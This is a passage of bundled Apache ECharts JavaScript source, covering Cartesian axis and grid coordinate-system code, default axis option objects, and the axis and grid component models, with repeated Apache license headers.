to this.getExtent(), which\n     * means globalExtent[0] may greater than globalExtent[1],\n     * unless `asc` is input.\n     *\n     * @param {boolean} [asc]\n     * @return {Array.<number>}\n     */\n    getGlobalExtent: function (asc) {\n        var ret = this.getExtent();\n        ret[0] = this.toGlobalCoord(ret[0]);\n        ret[1] = this.toGlobalCoord(ret[1]);\n        asc && ret[0] > ret[1] && ret.reverse();\n        return ret;\n    },\n\n    getOtherAxis: function () {\n        this.grid.getOtherAxis();\n    },\n\n    /**\n     * @override\n     */\n    pointToData: function (point, clamp) {\n        return this.coordToData(this.toLocalCoord(point[this.dim === 'x' ? 0 : 1]), clamp);\n    },\n\n    /**\n     * Transform global coord to local coord,\n     * i.e. var localCoord = axis.toLocalCoord(80);\n     * designate by module:echarts/coord/cartesian/Grid.\n     * @type {Function}\n     */\n    toLocalCoord: null,\n\n    /**\n     * Transform global coord to local coord,\n     * i.e. var globalCoord = axis.toLocalCoord(40);\n     * designate by module:echarts/coord/cartesian/Grid.\n     * @type {Function}\n     */\n    toGlobalCoord: null\n\n};\n\ninherits(Axis2D, Axis);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar defaultOption = {\n    show: true,\n    zlevel: 0,\n    z: 0,\n    // Inverse the axis.\n    inverse: false,\n\n    // Axis name displayed.\n    name: '',\n    // 'start' | 'middle' | 'end'\n    nameLocation: 'end',\n    // By degree. By defualt auto rotate by nameLocation.\n    nameRotate: null,\n    nameTruncate: {\n        maxWidth: null,\n        ellipsis: '...',\n        placeholder: '.'\n    },\n    // Use global text style by default.\n    nameTextStyle: {},\n    // The gap between axisName and axisLine.\n    nameGap: 15,\n\n    // Default `false` to support tooltip.\n    silent: false,\n    // Default `false` to avoid legacy user event listener fail.\n    triggerEvent: false,\n\n    tooltip: {\n        show: false\n    },\n\n    axisPointer: {},\n\n    axisLine: {\n        show: true,\n        onZero: true,\n        onZeroAxisIndex: null,\n        lineStyle: {\n            color: '#333',\n            width: 1,\n            type: 'solid'\n        },\n        // The arrow at both ends the the axis.\n        symbol: ['none', 'none'],\n        symbolSize: [10, 15]\n    },\n    axisTick: {\n        show: true,\n        // Whether axisTick is inside the grid or outside the grid.\n        inside: false,\n        // The length of axisTick.\n        length: 5,\n        lineStyle: {\n            width: 1\n        }\n    },\n    axisLabel: {\n        show: true,\n        // Whether axisLabel is inside the grid or outside the grid.\n        inside: false,\n        rotate: 0,\n        // true | false | null/undefined (auto)\n        showMinLabel: null,\n        // true | false | null/undefined (auto)\n        showMaxLabel: null,\n        margin: 8,\n        // formatter: null,\n        fontSize: 12\n    },\n    splitLine: {\n        show: true,\n        lineStyle: {\n            color: ['#ccc'],\n            width: 1,\n            type: 'solid'\n        }\n    },\n    splitArea: {\n        show: false,\n        areaStyle: {\n            color: ['rgba(250,250,250,0.3)', 'rgba(200,200,200,0.3)']\n        }\n    }\n};\n\nvar axisDefault = {};\n\naxisDefault.categoryAxis = merge({\n    // The gap at both ends of the axis. For categoryAxis, boolean.\n    boundaryGap: true,\n    // Set false to faster category collection.\n    // Only usefull in the case like: category is\n    // ['2012-01-01', '2012-01-02', ...], where the input\n    // data has been ensured not duplicate and is large data.\n    // null means \"auto\":\n    // if axis.data provided, do not deduplication,\n    // else do deduplication.\n    deduplication: null,\n    // splitArea: {\n        // show: false\n    // },\n    splitLine: {\n        show: false\n    },\n    axisTick: {\n        // If tick is align with label when boundaryGap is true\n        alignWithLabel: false,\n        interval: 'auto'\n    },\n    axisLabel: {\n        interval: 'auto'\n    }\n}, defaultOption);\n\naxisDefault.valueAxis = merge({\n    // The gap at both ends of the axis. For value axis, [GAP, GAP], where\n    // `GAP` can be an absolute pixel number (like `35`), or percent (like `'30%'`)\n    boundaryGap: [0, 0],\n\n    // TODO\n    // min/max: [30, datamin, 60] or [20, datamin] or [datamin, 60]\n\n    // Min value of the axis. can be:\n    // + a number\n    // + 'dataMin': use the min value in data.\n    // + null/undefined: auto decide min value (consider pretty look and boundaryGap).\n    // min: null,\n\n    // Max value of the axis. can be:\n    // + a number\n    // + 'dataMax': use the max value in data.\n    // + null/undefined: auto decide max value (consider pretty look and boundaryGap).\n    // max: null,\n\n    // Readonly prop, specifies start value of the range when using data zoom.\n    // rangeStart: null\n\n    // Readonly prop, specifies end value of the range when using data zoom.\n    // rangeEnd: null\n\n    // Optional value can be:\n    // + `false`: always include value 0.\n    // + `true`: the extent do not consider value 0.\n    // scale: false,\n\n    // AxisTick and axisLabel and splitLine are caculated based on splitNumber.\n    splitNumber: 5,\n\n    // Interval specifies the span of the ticks is mandatorily.\n    // interval: null\n\n    // Specify min interval when auto calculate tick interval.\n    // minInterval: null\n\n    // Specify max interval when auto calculate tick interval.\n    // maxInterval: null\n\n    minorTick: {\n        // Minor tick, not available for cateogry axis.\n        show: false,\n        // Split number of minor ticks. The value should be in range of (0, 100)\n        splitNumber: 5,\n        // Lenght of minor tick\n        length: 3,\n\n        // Same inside with axisTick\n\n        // Line style\n        lineStyle: {\n            // Default to be same with axisTick\n        }\n    },\n\n    minorSplitLine: {\n        show: false,\n\n        lineStyle: {\n            color: '#eee',\n            width: 1\n        }\n    }\n}, defaultOption);\n\naxisDefault.timeAxis = defaults({\n    scale: true,\n    min: 'dataMin',\n    max: 'dataMax'\n}, axisDefault.valueAxis);\n\naxisDefault.logAxis = defaults({\n    scale: true,\n    logBase: 10\n}, axisDefault.valueAxis);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// FIXME axisType is fixed ?\nvar AXIS_TYPES = ['value', 'category', 'time', 'log'];\n\n/**\n * Generate sub axis model class\n * @param {string} axisName 'x' 'y' 'radius' 'angle' 'parallel'\n * @param {module:echarts/model/Component} BaseAxisModelClass\n * @param {Function} axisTypeDefaulter\n * @param {Object} [extraDefaultOption]\n */\nvar axisModelCreator = function (axisName, BaseAxisModelClass, axisTypeDefaulter, extraDefaultOption) {\n\n    each$1(AXIS_TYPES, function (axisType) {\n\n        BaseAxisModelClass.extend({\n\n            /**\n             * @readOnly\n             */\n            type: axisName + 'Axis.' + axisType,\n\n            mergeDefaultAndTheme: function (option, ecModel) {\n                var layoutMode = this.layoutMode;\n                var inputPositionParams = layoutMode\n                    ? getLayoutParams(option) : {};\n\n                var themeModel = ecModel.getTheme();\n                merge(option, themeModel.get(axisType + 'Axis'));\n                merge(option, this.getDefaultOption());\n\n                option.type = axisTypeDefaulter(axisName, option);\n\n                if (layoutMode) {\n                    mergeLayoutParam(option, inputPositionParams, layoutMode);\n                }\n            },\n\n            /**\n             * @override\n             */\n            optionUpdated: function () {\n                var thisOption = this.option;\n                if (thisOption.type === 'category') {\n                    this.__ordinalMeta = OrdinalMeta.createByAxisModel(this);\n                }\n            },\n\n            /**\n             * Should not be called before all of 'getInitailData' finished.\n             * Because categories are collected during initializing data.\n             */\n            getCategories: function (rawData) {\n                var option = this.option;\n                // FIXME\n                // warning if called before all of 'getInitailData' finished.\n                if (option.type === 'category') {\n                    if (rawData) {\n                        return option.data;\n                    }\n                    return this.__ordinalMeta.categories;\n                }\n            },\n\n            getOrdinalMeta: function () {\n                return this.__ordinalMeta;\n            },\n\n            defaultOption: mergeAll(\n                [\n                    {},\n                    axisDefault[axisType + 'Axis'],\n                    extraDefaultOption\n                ],\n                true\n            )\n        });\n    });\n\n    ComponentModel.registerSubTypeDefaulter(\n        axisName + 'Axis',\n        curry(axisTypeDefaulter, axisName)\n    );\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar AxisModel = ComponentModel.extend({\n\n    type: 'cartesian2dAxis',\n\n    /**\n     * @type {module:echarts/coord/cartesian/Axis2D}\n     */\n    axis: null,\n\n    /**\n     * @override\n     */\n    init: function () {\n        AxisModel.superApply(this, 'init', arguments);\n        this.resetRange();\n    },\n\n    /**\n     * @override\n     */\n    mergeOption: function () {\n        AxisModel.superApply(this, 'mergeOption', arguments);\n        this.resetRange();\n    },\n\n    /**\n     * @override\n     */\n    restoreData: function () {\n        AxisModel.superApply(this, 'restoreData', arguments);\n        this.resetRange();\n    },\n\n    /**\n     * @override\n     * @return {module:echarts/model/Component}\n     */\n    getCoordSysModel: function () {\n        return this.ecModel.queryComponents({\n            mainType: 'grid',\n            index: this.option.gridIndex,\n            id: this.option.gridId\n        })[0];\n    }\n\n});\n\nfunction getAxisType(axisDim, option) {\n    // Default axis with data is category axis\n    return option.type || (option.data ? 'category' : 'value');\n}\n\nmerge(AxisModel.prototype, axisModelCommonMixin);\n\nvar extraOption = {\n    // gridIndex: 0,\n    // gridId: '',\n\n    // Offset is for multiple axis on the same position\n    offset: 0\n};\n\naxisModelCreator('x', AxisModel, getAxisType, extraOption);\naxisModelCreator('y', AxisModel, getAxisType, extraOption);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Grid 是在有直角坐标系的时候必须要存在的\n// 所以这里也要被 Cartesian2D 依赖\n\nComponentModel.extend({\n\n    type: 'grid',\n\n    dependencies: ['xAxis', 'yAxis'],\n\n    layoutMode: 'box',\n\n    /**\n     * @type {module:echarts/coord/cartesian/Grid}\n     */\n    coordinateSystem: null,\n\n    defaultOption: {\n        show: false,\n        zlevel: 0,\n        z: 0,\n        left: '10%',\n        top: 60,\n        right: '10%',\n        bottom: 60,\n        // If grid size contain label\n        containLabel: false,\n        // width: {totalWidth} - left - right,\n        // height: {totalHeight} - top - bottom,\n        backgroundColor: 'rgba(0,0,0,0)',\n        borderWidth: 1,\n        borderColor: '#ccc'\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Grid is a region which contains at most 4 cartesian systems\n *\n * TODO Default cartesian\n */\n\n// Depends on GridModel, AxisModel, which performs preprocess.\n/**\n * Check if the axis is used in the specified grid\n * @inner\n */\nfunction isAxisUsedInTheGrid(axisModel, gridModel, ecModel) {\n    return axisModel.getCoordSysModel() === gridModel;\n}\n\nfunction Grid(gridModel, ecModel, api) {\n    /**\n     * @type {Object.<string, module:echarts/coord/cartesian/Cartesian2D>}\n     * @private\n     */\n    this._coordsMap = {};\n\n    /**\n     * @type {Array.<module:echarts/coord/cartesian/Cartesian>}\n     * @private\n     */\n    this._coordsList = [];\n\n    /**\n     * @type {Object.<string, Array.<module:echarts/coord/cartesian/Axis2D>>}\n     * @private\n     */\n    this._axesMap = {};\n\n    /**\n     * @type {Array.<module:echarts/coord/cartesian/Axis2D>}\n     * @private\n     */\n    this._axesList = [];\n\n    this._initCartesian(gridModel, ecModel, api);\n\n    this.model = gridModel;\n}\n\nvar gridProto = Grid.prototype;\n\ngridProto.type = 'grid';\n\ngridProto.axisPointerEnabled = true;\n\ngridProto.getRect = function () {\n    return this._rect;\n};\n\ngridProto.update = function (ecModel, api) {\n\n    var axesMap = this._axesMap;\n\n    this._updateScale(ecModel, this.model);\n\n    each$1(axesMap.x, function (xAxis) {\n        niceScaleExtent(xAxis.scale, xAxis.model);\n    });\n    each$1(axesMap.y, function (yAxis) {\n        niceScaleExtent(yAxis.scale, yAxis.model);\n    });\n\n    // Key: axisDim_axisIndex, value: boolean, whether onZero target.\n    var onZeroRecords = {};\n\n    each$1(axesMap.x, function (xAxis) {\n        fixAxisOnZero(axesMap, 'y', xAxis, onZeroRecords);\n    });\n    each$1(axesMap.y, function (yAxis) {\n        fixAxisOnZero(axesMap, 'x', yAxis, onZeroRecords);\n    });\n\n    // Resize again if containLabel is enabled\n    // FIXME It may cause getting wrong grid size in data processing stage\n    this.resize(this.model, api);\n};\n\nfunction fixAxisOnZero(axesMap, otherAxisDim, axis, onZeroRecords) {\n\n    axis.getAxesOnZeroOf = function () {\n        // TODO: onZero of multiple axes.\n        return otherAxisOnZeroOf ? [otherAxisOnZeroOf] : [];\n    };\n\n    // onZero can not be enabled in these two situations:\n    // 1. When any other axis is a category axis.\n    // 2. When no axis is cross 0 point.\n    var otherAxes = axesMap[otherAxisDim];\n\n    var otherAxisOnZeroOf;\n    var axisModel = axis.model;\n    var onZero = axisModel.get('axisLine.onZero');\n    var onZeroAxisIndex = axisModel.get('axisLine.onZeroAxisIndex');\n\n    if (!onZero) {\n        return;\n    }\n\n    // If target axis is specified.\n    if (onZeroAxisIndex != null) {\n        if (canOnZeroToAxis(otherAxes[onZeroAxisIndex])) {\n            otherAxisOnZeroOf = otherAxes[onZeroAxisIndex];\n        }\n    }\n    else {\n        // Find the first available other axis.\n        for (var idx in otherAxes) {\n            if (otherAxes.hasOwnProperty(idx)\n                && canOnZeroToAxis(otherAxes[idx])\n                // Consider that two Y axes on one value axis,\n                // if both onZero, the two Y axes overlap.\n                && !onZeroRecords[getOnZeroRecordKey(otherAxes[idx])]\n            ) {\n                otherAxisOnZeroOf = otherAxes[idx];\n                break;\n            }\n        }\n    }\n\n    if (otherAxisOnZeroOf) {\n        onZeroRecords[getOnZeroRecordKey(otherAxisOnZeroOf)] = true;\n    }\n\n    function getOnZeroRecordKey(axis) {\n        return axis.dim + '_' + axis.index;\n    }\n}\n\nfunction canOnZeroToAxis(axis) {\n    return axis && axis.type !== 'category' && axis.type !== 'time' && ifAxisCrossZero(axis);\n}\n\n/**\n * Resize the grid\n * @param {module:echarts/coord/cartesian/GridModel} gridModel\n * @param {module:echarts/ExtensionAPI} api\n */\ngridProto.resize = function (gridModel, api, ignoreContainLabel) {\n\n    var gridRect = getLayoutRect(\n        gridModel.getBoxLayoutParams(), {\n            width: api.getWidth(),\n            height: api.getHeight()\n        });\n\n    this._rect = gridRect;\n\n    var axesList = this._axesList;\n\n    adjustAxes();\n\n    // Minus label size\n    if (!ignoreContainLabel && gridModel.get('containLabel')) {\n        each$1(axesList, function (axis) {\n            if (!axis.model.get('axisLabel.inside')) {\n                var labelUnionRect = estimateLabelUnionRect(axis);\n                if (labelUnionRect) {\n                    var dim = axis.isHorizontal() ? 'height' : 'width';\n                    var margin = axis.model.get('axisLabel.margin');\n                    gridRect[dim] -= labelUnionRect[dim] + margin;\n                    if (axis.position === 'top') {\n                        gridRect.y += labelUnionRect.height + margin;\n                    }\n                    else if (axis.position === 'left') {\n                        gridRect.x += labelUnionRect.width + margin;\n                    }\n                }\n            }\n        });\n\n        adjustAxes();\n    }\n\n    function adjustAxes() {\n        each$1(axesList, function (axis) {\n            var isHorizontal = axis.isHorizontal();\n            var extent = isHorizontal ? [0, gridRect.width] : [0, gridRect.height];\n            var idx = axis.inverse ? 1 : 0;\n            axis.setExtent(extent[idx], extent[1 - idx]);\n            updateAxisTransform(axis, isHorizontal ? gridRect.x : gridRect.y);\n        });\n    }\n};\n\n/**\n * @param {string} axisType\n * @param {number} [axisIndex]\n */\ngridProto.getAxis = function (axisType, axisIndex) {\n    var axesMapOnDim = this._axesMap[axisType];\n    if (axesMapOnDim != null) {\n        if (axisIndex == null) {\n            // Find first axis\n            for (var name in axesMapOnDim) {\n                if (axesMapOnDim.hasOwnProperty(name)) {\n                    return axesMapOnDim[name];\n                }\n            }\n        }\n        return axesMapOnDim[axisIndex];\n    }\n};\n\n/**\n * @return {Array.<module:echarts/coord/Axis>}\n */\ngridProto.getAxes = function () {\n    return this._axesList.slice();\n};\n\n/**\n * Usage:\n *      grid.getCartesian(xAxisIndex, yAxisIndex);\n *      grid.getCartesian(xAxisIndex);\n *      grid.getCartesian(null, yAxisIndex);\n *      grid.getCartesian({xAxisIndex: ..., yAxisIndex: ...});\n *\n * @param {number|Object} [xAxisIndex]\n * @param {number} [yAxisIndex]\n */\ngridProto.getCartesian = function (xAxisIndex, yAxisIndex) {\n    if (xAxisIndex != null && yAxisIndex != null) {\n        var key = 'x' + xAxisIndex + 'y' + yAxisIndex;\n        return this._coordsMap[key];\n    }\n\n    if (isObject$1(xAxisIndex)) {\n        yAxisIndex = xAxisIndex.yAxisIndex;\n        xAxisIndex = xAxisIndex.xAxisIndex;\n    }\n    // When only xAxisIndex or yAxisIndex given, find its first cartesian.\n    for (var i = 0, coordList = this._coordsList; i < coordList.length; i++) {\n        if (coordList[i].getAxis('x').index === xAxisIndex\n            || coordList[i].getAxis('y').index === yAxisIndex\n        ) {\n            return coordList[i];\n        }\n    }\n};\n\ngridProto.getCartesians = function () {\n    return this._coordsList.slice();\n};\n\n/**\n * @implements\n * see {module:echarts/CoodinateSystem}\n */\ngridProto.convertToPixel = function (ecModel, finder, value) {\n    var target = this._findConvertTarget(ecModel, finder);\n\n    return target.cartesian\n        ? target.cartesian.dataToPoint(value)\n        : target.axis\n        ? target.axis.toGlobalCoord(target.axis.dataToCoord(value))\n        : null;\n};\n\n/**\n * @implements\n * see {module:echarts/CoodinateSystem}\n */\ngridProto.convertFromPixel = function (ecModel, finder, value) {\n    var target = this._findConvertTarget(ecModel, finder);\n\n    return target.cartesian\n        ? target.cartesian.pointToData(value)\n        : target.axis\n        ? target.axis.coordToData(target.axis.toLocalCoord(value))\n        : null;\n};\n\n/**\n * @inner\n */\ngridProto._findConvertTarget = function (ecModel, finder) {\n    var seriesModel = finder.seriesModel;\n    var xAxisModel = finder.xAxisModel\n        || (seriesModel && seriesModel.getReferringComponents('xAxis')[0]);\n    var yAxisModel = finder.yAxisModel\n        || (seriesModel && seriesModel.getReferringComponents('yAxis')[0]);\n    var gridModel = finder.gridModel;\n    var coordsList = this._coordsList;\n    var cartesian;\n    var axis;\n\n    if (seriesModel) {\n        cartesian = seriesModel.coordinateSystem;\n        indexOf(coordsList, cartesian) < 0 && (cartesian = null);\n    }\n    else if (xAxisModel && yAxisModel) {\n        cartesian = this.getCartesian(xAxisModel.componentIndex, yAxisModel.componentIndex);\n    }\n    else if (xAxisModel) {\n        axis = this.getAxis('x', xAxisModel.componentIndex);\n    }\n    else if (yAxisModel) {\n        axis = this.getAxis('y', yAxisModel.componentIndex);\n    }\n    // Lowest priority.\n    else if (gridModel) {\n        var grid = gridModel.coordinateSystem;\n        if (grid === this) {\n            cartesian = this._coordsList[0];\n        }\n    }\n\n    return {cartesian: cartesian, axis: axis};\n};\n\n/**\n * @implements\n * see {module:echarts/CoodinateSystem}\n */\ngridProto.containPoint = function (point) {\n    var coord = this._coordsList[0];\n    if (coord) {\n        return coord.containPoint(point);\n    }\n};\n\n/**\n * Initialize cartesian coordinate systems\n * @private\n */\ngridProto._initCartesian = function (gridModel, ecModel, api) {\n    var axisPositionUsed = {\n        left: false,\n        right: false,\n        top: false,\n        bottom: false\n    };\n\n    var axesMap = {\n        x: {},\n        y: {}\n    };\n    var axesCount = {\n        x: 0,\n        y: 0\n    };\n\n    /// Create axis\n    ecModel.eachComponent('xAxis', createAxisCreator('x'), this);\n    ecModel.eachComponent('yAxis', createAxisCreator('y'), this);\n\n    if (!axesCount.x || !axesCount.y) {\n        // Roll back when there no either x or y axis\n        this._axesMap = {};\n        this._axesList = [];\n        return;\n    }\n\n    this._axesMap = axesMap;\n\n    /// Create cartesian2d\n    each$1(axesMap.x, function (xAxis, xAxisIndex) {\n        each$1(axesMap.y, function (yAxis, yAxisIndex) {\n            var key = 'x' + xAxisIndex + 'y' + yAxisIndex;\n            var cartesian = new Cartesian2D(key);\n\n            cartesian.grid = this;\n            cartesian.model = gridModel;\n\n            this._coordsMap[key] = cartesian;\n            this._coordsList.push(cartesian);\n\n            cartesian.addAxis(xAxis);\n            cartesian.addAxis(yAxis);\n        }, this);\n    }, this);\n\n    function createAxisCreator(axisType) {\n        return function (axisModel, idx) {\n            if (!isAxisUsedInTheGrid(axisModel, gridModel, ecModel)) {\n                return;\n            }\n\n            var axisPosition = axisModel.get('position');\n            if (axisType === 'x') {\n                // Fix position\n                if (axisPosition !== 'top' && axisPosition !== 'bottom') {\n                    // Default bottom of X\n                    axisPosition = axisPositionUsed.bottom ? 'top' : 'bottom';\n                }\n            }\n            else {\n                // Fix position\n                if (axisPosition !== 'left' && axisPosition !== 'right') {\n                    // Default left of Y\n                    axisPosition = axisPositionUsed.left ? 'right' : 'left';\n                }\n            }\n            axisPositionUsed[axisPosition] = true;\n\n            var axis = new Axis2D(\n                axisType, createScaleByModel(axisModel),\n                [0, 0],\n                axisModel.get('type'),\n                axisPosition\n            );\n\n            var isCategory = axis.type === 'category';\n            axis.onBand = isCategory && axisModel.get('boundaryGap');\n            axis.inverse = axisModel.get('inverse');\n\n            // Inject axis into axisModel\n            axisModel.axis = axis;\n\n            // Inject axisModel into axis\n            axis.model = axisModel;\n\n            // Inject grid info axis\n            axis.grid = this;\n\n            // Index of axis, can be used as key\n            axis.index = idx;\n\n            this._axesList.push(axis);\n\n            axesMap[axisType][idx] = axis;\n            axesCount[axisType]++;\n        };\n    }\n};\n\n/**\n * Update cartesian properties from series\n * @param  {module:echarts/model/Option} option\n * @private\n */\ngridProto._updateScale = function (ecModel, gridModel) {\n    // Reset scale\n    each$1(this._axesList, function (axis) {\n        axis.scale.setExtent(Infinity, -Infinity);\n    });\n    ecModel.eachSeries(function (seriesModel) {\n        if (isCartesian2D(seriesModel)) {\n            var axesModels = findAxesModels(seriesModel, ecModel);\n            var xAxisModel = axesModels[0];\n            var yAxisModel = axesModels[1];\n\n            if (!isAxisUsedInTheGrid(xAxisModel, gridModel, ecModel)\n                || !isAxisUsedInTheGrid(yAxisModel, gridModel, ecModel)\n            ) {\n                return;\n            }\n\n            var cartesian = this.getCartesian(\n                xAxisModel.componentIndex, yAxisModel.componentIndex\n            );\n            var data = seriesModel.getData();\n            var xAxis = cartesian.getAxis('x');\n            var yAxis = cartesian.getAxis('y');\n\n            if (data.type === 'list') {\n                unionExtent(data, xAxis, seriesModel);\n                unionExtent(data, yAxis, seriesModel);\n            }\n        }\n    }, this);\n\n    function unionExtent(data, axis, seriesModel) {\n        each$1(data.mapDimension(axis.dim, true), function (dim) {\n            axis.scale.unionExtentFromData(\n                // For example, the extent of the orginal dimension\n                // is [0.1, 0.5], the extent of the `stackResultDimension`\n                // is [7, 9], the final extent should not include [0.1, 0.5].\n                data, getStackedDimension(data, dim)\n            );\n        });\n    }\n};\n\n/**\n * @param {string} [dim] 'x' or 'y' or 'auto' or null/undefined\n * @return {Object} {baseAxes: [], otherAxes: []}\n */\ngridProto.getTooltipAxes = function (dim) {\n    var baseAxes = [];\n    var otherAxes = [];\n\n    each$1(this.getCartesians(), function (cartesian) {\n        var baseAxis = (dim != null && dim !== 'auto')\n            ? cartesian.getAxis(dim) : cartesian.getBaseAxis();\n        var otherAxis = cartesian.getOtherAxis(baseAxis);\n        indexOf(baseAxes, baseAxis) < 0 && baseAxes.push(baseAxis);\n        indexOf(otherAxes, otherAxis) < 0 && otherAxes.push(otherAxis);\n    });\n\n    return {baseAxes: baseAxes, otherAxes: otherAxes};\n};\n\n/**\n * @inner\n */\nfunction updateAxisTransform(axis, coordBase) {\n    var axisExtent = axis.getExtent();\n    var axisExtentSum = axisExtent[0] + axisExtent[1];\n\n    // Fast transform\n    axis.toGlobalCoord = axis.dim === 'x'\n        ? function (coord) {\n            return coord + coordBase;\n        }\n        : function (coord) {\n            return axisExtentSum - coord + coordBase;\n        };\n    axis.toLocalCoord = axis.dim === 'x'\n        ? function (coord) {\n            return coord - coordBase;\n        }\n        : function (coord) {\n            return axisExtentSum - coord + coordBase;\n        };\n}\n\nvar axesTypes = ['xAxis', 'yAxis'];\n/**\n * @inner\n */\nfunction findAxesModels(seriesModel, ecModel) {\n    return map(axesTypes, function (axisType) {\n        var axisModel = seriesModel.getReferringComponents(axisType)[0];\n\n        if (__DEV__) {\n            if (!axisModel) {\n                throw new Error(axisType + ' \"' + retrieve(\n                    seriesModel.get(axisType + 'Index'),\n                    seriesModel.get(axisType + 'Id'),\n                    0\n                ) + '\" not found');\n            }\n        }\n        return axisModel;\n    });\n}\n\n/**\n * @inner\n */\nfunction isCartesian2D(seriesModel) {\n    return seriesModel.get('coordinateSystem') === 'cartesian2d';\n}\n\nGrid.create = function (ecModel, api) {\n    var grids = [];\n    ecModel.eachComponent('grid', function (gridModel, idx) {\n        var grid = new Grid(gridModel, ecModel, api);\n        grid.name = 'grid_' + idx;\n        // dataSampling requires axis extent, so resize\n        // should be performed in create stage.\n        grid.resize(gridModel, api, true);\n\n        gridModel.coordinateSystem = grid;\n\n        grids.push(grid);\n    });\n\n    // Inject the coordinateSystems into seriesModel\n    ecModel.eachSeries(function (seriesModel) {\n        if (!isCartesian2D(seriesModel)) {\n            return;\n        }\n\n        var axesModels = findAxesModels(seriesModel, ecModel);\n        var xAxisModel = axesModels[0];\n        var yAxisModel = axesModels[1];\n\n        var gridModel = xAxisModel.getCoordSysModel();\n\n        if (__DEV__) {\n            if (!gridModel) {\n                throw new Error(\n                    'Grid \"' + retrieve(\n                        xAxisModel.get('gridIndex'),\n                        xAxisModel.get('gridId'),\n                        0\n                    ) + '\" not found'\n                );\n            }\n            if (xAxisModel.getCoordSysModel() !== yAxisModel.getCoordSysModel()) {\n                throw new Error('xAxis and yAxis must use the same grid');\n            }\n        }\n\n        var grid = gridModel.coordinateSystem;\n\n        seriesModel.coordinateSystem = grid.getCartesian(\n            xAxisModel.componentIndex, yAxisModel.componentIndex\n        );\n    });\n\n    return grids;\n};\n\n// For deciding which dimensions to use when creating list data\nGrid.dimensions = Grid.prototype.dimensions = Cartesian2D.prototype.dimensions;\n\nCoordinateSystemManager.register('cartesian2d', Grid);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PI$2 = Math.PI;\n\n/**\n * A final axis is translated and rotated from a \"standard axis\".\n * So opt.position and opt.rotation is required.\n *\n * A standard axis is and axis from [0, 0] to [0, axisExtent[1]],\n * for example: (0, 0) ------------> (0, 50)\n *\n * nameDirection or tickDirection or labelDirection is 1 means tick\n * or label is below the standard axis, whereas is -1 means above\n * the standard axis. labelOffset means offset between label and axis,\n * which is useful when 'onZero', where axisLabel is in the grid and\n * label in outside grid.\n *\n * Tips: like always,\n * positive rotation represents anticlockwise, and negative rotation\n * represents clockwise.\n * The direction of position coordinate is the same as the direction\n * of screen coordinate.\n *\n * Do not need to consider axis 'inverse', which is auto processed by\n * axis extent.\n *\n * @param {module:zrender/container/Group} group\n * @param {Object} axisModel\n * @param {Object} opt Standard axis parameters.\n * @param {Array.<number>} opt.position [x, y]\n * @param {number} opt.rotation by radian\n * @param {number} [opt.nameDirection=1] 1 or -1 Used when nameLocation is 'middle' or 'center'.\n * @param {number} [opt.tickDirection=1] 1 or -1\n * @param {number} [opt.labelDirection=1] 1 or -1\n * @param {number} [opt.labelOffset=0] Usefull when onZero.\n * @param {string} [opt.axisLabelShow] default get from axisModel.\n * @param {string} [opt.axisName] default get from axisModel.\n * @param 